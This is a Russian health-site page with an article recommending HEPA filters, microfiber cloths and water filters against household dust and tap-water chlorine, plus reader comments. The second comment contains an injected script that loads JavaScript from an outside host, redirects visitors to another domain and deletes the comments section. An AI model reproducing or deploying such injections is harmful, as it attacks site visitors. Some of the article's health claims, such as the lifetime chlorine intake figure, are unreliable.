Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Оружие для защиты дома  >>  Оружие для защиты дома
 
Обратная связь
 

Оружие для защиты дома

Размер шрифта
31 января 2012 09:00
  • google_analytics: false
  • Нравится

Опасности подстерегают нас на каждом шагу даже в собственном доме. Что поможет с ними справиться?

1

Фильтр для пылесоса

Когда мы пылесосим, в воздух могут вылетать невидимые частички пыли, которые и являются частой причиной развития аллергий и бронхоспазма.. Но специальный фильтр HEPA устраняет из воздуха практически все виды аллергенов и большинства вредных веществ.

1

Тряпка из микрофибры

Обычная влажная тряпка из старой одежды от пыли не помогает. При испарении влаги с поверхности мебели или техники образуются крошечные водяные шарики с пылинками в середине. Но существуют специальные тряпки из микрофибры. Микрофибра – это модифицированные волокна хлопка, полиэфира, вискозы. Она состоит из отдельных мельчайших микроволокон, которые могут проникать даже в самые маленькие щели и удалять оттуда загрязнение.

1

Фильтр для воды

В питьевой воде из под крана содержится хлор, чтобы убивать микробы. Хлор – токсическое вещество 1 класса опасности, которое использовали как оружие еще в 1 мировую войну. В России вся водопроводная вода хлорированная. За жизнь мы съедаем 15 килограмм хлора, употребляя воду из-под крана. Именно от хлора нас спасают водные фильтры.


 

Сюжеты по теме:
Оружие для защиты дома. Три помощника

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - ChapaikinVA

03 февраля 2012 в 20:05

Цитировать   |   Пожаловаться

Почему никто не говорит, о том, что от хлора в воде можно, наверное, избавиться с помощью ультразвука. В инструкции к ультразвуковому стиральному устройству написано, что, если его поместить в сосуд с водопроводной водой на некоторое время, ультразвук будет ускорять (насколько я понимаю) дегазацию. Т. е., через некоторое время хлор (в частности), отделится от воды и улетит. Кроме того, ультразвук убивает микробы.

Но, почему-то специальные ультразвуковые устройства (для питьевой воды) не производят (я не слышал). Т. е., из доступных для бытового применения - только ультразвуковые стиральные устройства. Почему и не говорят о таком применении ультразвука (или я что-то не так понимаю)?

Чтобы использовать: либо иметь отдельное (только для питьевой воды, не используемое для стирки), либо помещать такое устройство, например, стакан / маленькую баночку с водой («грязную» внутри, но «чистую» снаружи), а сам стакан / баночку - уже в большой сосуд, где питьевая вода (так чтобы вода внутри стакана не соприкасалась непосредственно с питьевой водой). Ультразвук будет проходить через стеклянную стенку, а «грязь» (если какая-то есть, в том числе, если отделяются частицы вещества пластмассового корпуса устройства) - в питьевую воду не попадёт.

2 - zzzzzz

30 июня 2015 в 23:58

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.